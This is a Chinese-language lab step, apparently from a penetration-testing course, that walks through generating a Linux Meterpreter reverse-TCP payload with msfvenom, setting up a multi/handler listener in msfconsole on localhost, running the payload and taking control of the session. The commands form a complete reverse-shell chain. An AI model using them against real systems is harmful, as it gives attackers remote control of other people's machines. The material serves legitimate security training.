在图形化目标上建立 Meterpreter 会话
在本步骤中,你将模拟在一台机器上完成一个完整的攻击周期。你将使用 msfvenom 创建一个 payload,使用 msfconsole 设置一个监听器,然后执行 payload 以建立与你自己的机器的 Meterpreter 会话。这是一种安全且常见的练习渗透测试技术的方式。
首先,打开一个终端,使用 msfvenom 生成一个 Linux Meterpreter payload。此命令会创建一个可执行文件,该文件在运行时会连接回我们的监听器。
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
-p: 指定要使用的 payload。
LHOST=127.0.0.1: “监听主机”的 IP 地址。我们使用 127.0.0.1,因为我们的监听器将在同一台机器上。
LPORT=4444: 要连接回的端口。
-f elf: 输出格式,对于 Linux 来说是可执行文件。
-o: 输出文件名。
接下来,使生成的 payload 可执行:
chmod +x ~/project/payload.elf
现在,你需要设置监听器来捕获来自 payload 的连接。以安静模式启动 Metasploit Framework 控制台:
msfconsole -q
在 msfconsole 中,配置 multi/handler 来监听传入的连接。逐个输入以下命令:
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
现在,将监听器作为后台作业运行,这样你仍然可以使用控制台:
exploit -j
你应该会看到一条消息,表明监听器已启动。现在,你需要执行 payload。通过点击终端窗口中的 + 图标,打开一个新的、第二个终端标签页。在新标签页中,运行你创建的 payload:
~/project/payload.elf
切换回你的第一个终端标签页,其中运行着 msfconsole。你应该会看到一条消息,表明已打开一个 Meterpreter 会话。为了验证并与之交互,列出活动会话:
sessions -l
你将看到你的新会话及其 ID,很可能是 1。使用其 ID 与之交互:
sessions -i 1
你的提示符应该会变为 meterpreter >,这确认你现在已控制该会话。